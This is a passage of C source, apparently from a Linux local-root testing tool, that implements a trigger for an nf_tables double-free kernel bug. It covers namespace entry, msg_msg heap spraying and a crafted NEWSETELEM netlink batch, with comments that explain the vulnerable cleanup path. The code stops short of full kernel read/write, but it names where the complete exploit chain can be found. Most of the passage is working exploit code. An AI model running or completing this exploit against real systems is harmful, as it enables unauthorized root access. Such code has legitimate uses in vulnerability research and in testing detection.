fprintf(stderr, "[*] nf_tables: entered userns+netns; opening nfnetlink\n");
|
||||
}
|
||||
|
||||
int sock = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, NETLINK_NETFILTER);
|
||||
if (sock < 0) { perror("[-] socket(NETLINK_NETFILTER)"); _exit(21); }
|
||||
|
||||
struct sockaddr_nl src = { .nl_family = AF_NETLINK };
|
||||
if (bind(sock, (struct sockaddr *)&src, sizeof src) < 0) {
|
||||
perror("[-] bind"); close(sock); _exit(22);
|
||||
}
|
||||
/* Larger receive buffer so error replies don't drop. */
|
||||
int rcvbuf = 1 << 20;
|
||||
setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof rcvbuf);
|
||||
|
||||
/* Phase 1: pre-spray msg_msg so the slab is predictable. */
|
||||
int qids[SPRAY_MSGS];
|
||||
for (int i = 0; i < SPRAY_MSGS; i++) qids[i] = -1;
|
||||
if (spray_msg_msg(qids, SPRAY_MSGS / 2) < 0) {
|
||||
fprintf(stderr, "[-] nf_tables: pre-spray failed\n");
|
||||
close(sock); _exit(23);
|
||||
}
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] nf_tables: pre-sprayed %d msg_msg slots\n",
|
||||
SPRAY_MSGS / 2);
|
||||
}
|
||||
|
||||
/* Phase 2: build the ruleset batch. */
|
||||
uint8_t *batch = calloc(1, 16 * 1024);
|
||||
if (!batch) { close(sock); _exit(24); }
|
||||
size_t off = 0;
|
||||
uint32_t seq = (uint32_t)time(NULL);
|
||||
|
||||
put_batch_begin(batch, &off, seq++);
|
||||
put_new_table(batch, &off, seq++);
|
||||
put_new_chain(batch, &off, seq++);
|
||||
put_new_set(batch, &off, seq++);
|
||||
put_malicious_setelem(batch, &off, seq++);
|
||||
put_batch_end(batch, &off, seq++);
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] nf_tables: sending NEWTABLE/NEWCHAIN/NEWSET/"
|
||||
"NEWSETELEM batch (%zu bytes)\n", off);
|
||||
}
|
||||
if (nft_send_batch(sock, batch, off) < 0) {
|
||||
fprintf(stderr, "[-] nf_tables: batch send failed\n");
|
||||
drain_spray(qids, SPRAY_MSGS);
|
||||
free(batch); close(sock); _exit(25);
|
||||
}
|
||||
|
||||
/* Snapshot slabinfo before trigger. */
|
||||
long before = slabinfo_active("kmalloc-cg-96");
|
||||
if (before < 0) before = slabinfo_active("kmalloc-96");
|
||||
|
||||
/* Phase 3: post-spray to claim the slot the about-to-be-freed
|
||||
* chain reference will vacate. (On a real exploit this is the
|
||||
* spray with a target object — sk_buff fragment list, msg_msg
|
||||
* payload of just-right size, etc. We spray msg_msg again as
|
||||
* a placeholder.) */
|
||||
if (spray_msg_msg(qids + SPRAY_MSGS / 2, SPRAY_MSGS / 2) < 0) {
|
||||
fprintf(stderr, "[-] nf_tables: post-spray failed\n");
|
||||
}
|
||||
|
||||
/* Phase 4: fire the trigger. The malicious setelem we already
|
||||
* queued above caused nft_verdict_init() to grab a chain ref
|
||||
* on a NFT_GOTO whose chain doesn't actually exist. On commit
|
||||
* (or rollback, depending on kernel rev), the cleanup path
|
||||
* frees that chain ref twice. We can fire the commit either
|
||||
* by sending a second batch with DELRULE/DELSET, or by
|
||||
* closing the netlink socket while the transaction is
|
||||
* uncommitted.
|
||||
*
|
||||
* Easiest: re-send the *same* malicious setelem inside its
|
||||
* own batch. The second NEWSETELEM with NLM_F_CREATE on the
|
||||
* already-present element triggers EEXIST in the commit
|
||||
* phase, which on vulnerable kernels still runs the cleanup
|
||||
* that double-frees the chain ref. */
|
||||
size_t off2 = 0;
|
||||
seq++;
|
||||
put_batch_begin(batch, &off2, seq++);
|
||||
put_malicious_setelem(batch, &off2, seq++);
|
||||
put_batch_end(batch, &off2, seq++);
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] nf_tables: firing trigger (re-send malicious "
|
||||
"setelem to provoke commit-time double-free)\n");
|
||||
}
|
||||
nft_send_batch(sock, batch, off2);
|
||||
|
||||
/* Give the kernel time to run the commit cleanup. */
|
||||
usleep(50 * 1000);
|
||||
|
||||
long after = slabinfo_active("kmalloc-cg-96");
|
||||
if (after < 0) after = slabinfo_active("kmalloc-96");
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[i] nf_tables: kmalloc-cg-96 active: %ld → %ld\n",
|
||||
before, after);
|
||||
}
|
||||
|
||||
drain_spray(qids, SPRAY_MSGS);
|
||||
free(batch);
|
||||
close(sock);
|
||||
|
||||
/* Honest scope: we fired the bug but did not complete the
|
||||
* R/W primitive. Return a distinctive exit code so the
|
||||
* parent can report EXPLOIT_FAIL with the right message. */
|
||||
_exit(100);
|
||||
}
|
||||
|
||||
/* --- PARENT --- */
|
||||
int status;
|
||||
waitpid(child, &status, 0);
|
||||
|
||||
if (!WIFEXITED(status)) {
|
||||
/* Child died by signal — could be KASAN-triggered kernel
|
||||
* panic propagating as SIGBUS, or a clean SIGSEGV in our
|
||||
* groom. Either way: trigger fired in some form. */
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[!] nf_tables: child died by signal %d — bug likely "
|
||||
"fired (KASAN/oops can manifest as child signal)\n",
|
||||
WTERMSIG(status));
|
||||
}
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
int rc = WEXITSTATUS(status);
|
||||
if (rc == 100) {
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[!] nf_tables: trigger fired; double-free state\n"
|
||||
" induced in nft chain refcount. Full kernel\n"
|
||||
" R/W chain NOT executed (Option B scope).\n"
|
||||
"[i] nf_tables: to complete the exploit, port\n"
|
||||
" Notselwyn's pipapo leak + msg_msg+sk_buff\n"
|
||||
" cross-cache groom + modprobe_path overwrite\n"
|
||||
" from github.com/Notselwyn/CVE-2024-1086.\n");
|
||||
}
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
if (rc >= 20 && rc <= 25) {
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[-] nf_tables: trigger setup failed (child rc=%d)\n", rc);
|
||||
}
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[-] nf_tables: unexpected child rc=%d\n", rc);
|
||||
}
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
/* ----- Embedded detection rules ----- */
|
||||
|
||||
Reference in New Issue
Block a user